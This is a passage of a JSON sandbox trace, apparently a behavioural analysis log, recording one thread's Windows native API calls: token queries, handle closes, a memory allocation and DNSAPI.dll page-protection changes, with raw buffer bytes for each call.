"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb1\\xf7\\xdf\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xea\\x15\\x07\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb1\\xf7\\xdf\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xea\\x15\\x07\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1299 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee21117c7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1300 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee004f000" }, { "name": "ModuleName", "value": "DNSAPI.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1301 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee004f000" }, { "name": "ModuleName", "value": "DNSAPI.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1302 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1303 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee3350cd1", "parentcaller": "0x7ffee337e1fa", "category": "filesystem", "api": "NtOpenDirectoryObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "DirectoryHandle", "value": "0x00000490" }, { "name": "DesiredAccess", "value": "0x00020001", "pretty_value": "FILE_READ_ACCESS|READ_CONTROL" }, { "name": "ObjectAttributes", "value": "C:\\RPC Control" } ], "repeated": 0, "id": 1304 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee110026b", "parentcaller": "0x7ffee3350daf", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x0000048c" } ], "repeated": 0, "id": 1305 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34a8cde", "parentcaller": "0x7ffee34e9c4e", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1306 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e46", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "4" }, { "name": "TokenInformation", "value": "H2\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00w\\x00s\\x00\\\\x00S\\x00y\\x00s\\x00t\\x00e\\x00m\\x003\\x002\\x00\\\\x00r\\x00a\\x00s\\x00a\\x00d\\x00h\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00FO" } ], "repeated": 0, "id": 1307 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e9b", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\x10$\\x96\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1308 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6ec0", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1309 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f0e", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "\\xa8\\xd0\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00" } ], "repeated": 0, "id": 1310 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f37", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1311 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f8f", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "\\x88%\\x96\\x00\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00" } ], "repeated": 0, "id": 1312 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d7048", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x005\\xa6\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00`\\xe1\\x15\\x07\\x00\\x00\\x00\\x00X\\xe1\\x15\\x07\\x00\\x00\\x00\\x00(\\xe1\\x15\\x07\\x00\\x00\\x00\\x00H\\xe1\\x15\\x07" } ], "repeated": 0, "id": 1313 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d707b", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80%\\x96\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00H\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\x8c\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7" } ], "repeated": 0, "id": 1314 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34a8cde", "parentcaller": "0x7ffee34a953a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1315 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e46", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "4" }, { "name": "TokenInformation", "value": "\\x88(\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1316 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d4b000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1317 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e9b", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "0\\xb1\\xd4\\x05\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1318 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6ec0", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1319 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f0e", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "\\x88\\xcf\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00" } ], "repeated": 0, "id": 1320 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f37", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1321 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f8f", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "\\x88\\xae\\xd4\\x05\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00" } ], "repeated": 0, "id": 1322 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d7048", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00\\x95\\xab\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\xc0\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\xb8\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\x88\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\xa8\\xdd\\x15\\x07" } ], "repeated": 0, "id": 1323 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d707b", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\xae\\xd4\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\xa8\\xdb\\x15\\x07\\x00\\x00\\x00\\x00\\x8c\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7" } ], "repeated": 0, "id": 1324 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee3350e27", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1325 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee3350e49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1326 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1327 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee3350cd1", "parentcaller": "0x7ffee3381530", "category": "filesystem", "api": "NtOpenDirectoryObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "DirectoryHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x00020001", "pretty_value": "FILE_READ_ACCESS|READ_CONTROL" }, { "name": "ObjectAttributes", "value": "C:\\RPC Control" } ], "repeated": 0, "id": 1328 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee110026b", "parentcaller": "0x7ffee3350daf", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000490" } ], "repeated": 0, "id": 1329 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34a8cde", "parentcaller": "0x7ffee34e9c4e", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1330 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e46", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "4" }, { "name": "TokenInformation", "value": "H2\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00w\\x00s\\x00\\\\x00S\\x00y\\x00s\\x00t\\x00e\\x00m\\x003\\x002\\x00\\\\x00r\\x00a\\x00s\\x00a\\x00d\\x00h\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00FO" } ], "repeated": 0, "id": 1331 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e9b", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\x10$\\x96\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1332 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6ec0", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1333 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f0e", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "\\xb8\\xd2\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00" } ], "repeated": 0, "id": 1334 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f37", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1335 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f8f", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "\\x88%\\x96\\x00\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00" } ], "repeated": 0, "id": 1336 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d7048", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00\\x95\\xa9\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\xc0\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\xb8\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\x88\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\xa8\\xdf\\x15\\x07" } ], "repeated": 0, "id": 1337 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d707b", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80%\\x96\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\xa8\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\x90\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7" } ], "repeated": 0, "id": 1338 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34a8cde", "parentcaller": "0x7ffee34a953a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1339 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e46", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "4" }, { "name": "TokenInformation", "value": "\\x88(\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1340 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6e9b", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": 